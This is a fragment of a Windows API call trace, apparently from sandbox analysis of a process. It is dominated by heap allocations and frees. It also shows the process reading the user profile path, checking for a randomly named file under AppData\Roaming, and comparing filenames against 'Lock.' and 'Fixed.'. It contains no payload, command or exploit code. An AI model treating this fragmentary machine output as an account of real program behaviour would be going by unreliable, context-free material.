RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0151.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0151.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0151.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0151.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0151.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0151.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0151.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0151.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0151.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0151.949] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0151.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0151.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0151.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0151.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0151.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0151.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0151.949] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0151.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0151.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0151.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0151.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0151.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0151.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0151.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0151.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0151.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0151.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0151.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0151.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0151.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0151.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0151.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0151.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0151.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0151.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0151.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0151.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0151.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0151.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0151.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0151.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0151.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0151.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0151.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0151.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0151.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0151.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0151.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5e) returned 0x2a68440 [0151.951] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/V7-K_kNP-.pptx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\V7-K_kNP-.pptx", lpFilePart=0x8cf650*="V7-K_kNP-.pptx") returned 0x2e [0151.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0151.951] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\V7-K_kNP-.pptx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\v7-k_knp-.pptx")) returned 0xffffffff [0151.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0151.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0151.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0151.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0151.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0151.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0151.957] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0151.957] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.957] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0151.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0151.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0151.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0151.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0151.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0151.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0151.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0151.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0151.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0151.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0151.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0151.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0151.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WvHidWJPV.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0151.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vHidWJPV.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0151.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HidWJPV.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0151.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="idWJPV.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0151.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dWJPV.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0151.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WJPV.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0151.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JPV.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0151.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PV.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0151.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0151.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0151.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0151.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0151.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0151.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0151.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0151.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0151.959] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0151.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0151.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0151.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0151.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0151.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0151.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0151.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0151.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0151.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0151.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0151.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0151.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0151.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0151.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0151.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0151.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0151.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2a77e90 [0151.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0151.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WvHidWJPV.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vHidWJPV.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HidWJPV.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="idWJPV.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dWJPV.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0151.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WJPV.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JPV.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PV.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0151.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0151.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0151.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0151.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0151.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0151.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0151.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0151.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0151.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0151.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0151.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0151.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0151.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0151.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0151.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0151.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.960] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0151.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0151.960] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0151.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0151.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0151.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0151.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a88 [0151.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0151.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0151.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0151.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0151.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0151.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0151.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0151.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0151.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0151.961] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0151.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0151.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0151.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0151.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0151.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0151.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0151.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0151.961] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0151.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0151.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0151.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0151.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0151.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0151.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0151.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0151.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0151.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0151.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0151.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0151.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0151.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0151.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0151.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0151.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0151.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0151.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0151.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0151.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0151.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0151.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0151.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719f8 [0151.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0151.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0151.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0151.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0151.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0151.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0151.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0151.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0151.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0151.962] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0151.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0151.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0151.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0151.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0151.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0151.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0151.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0151.963] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0151.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0151.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0151.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0151.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0151.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0151.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0151.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 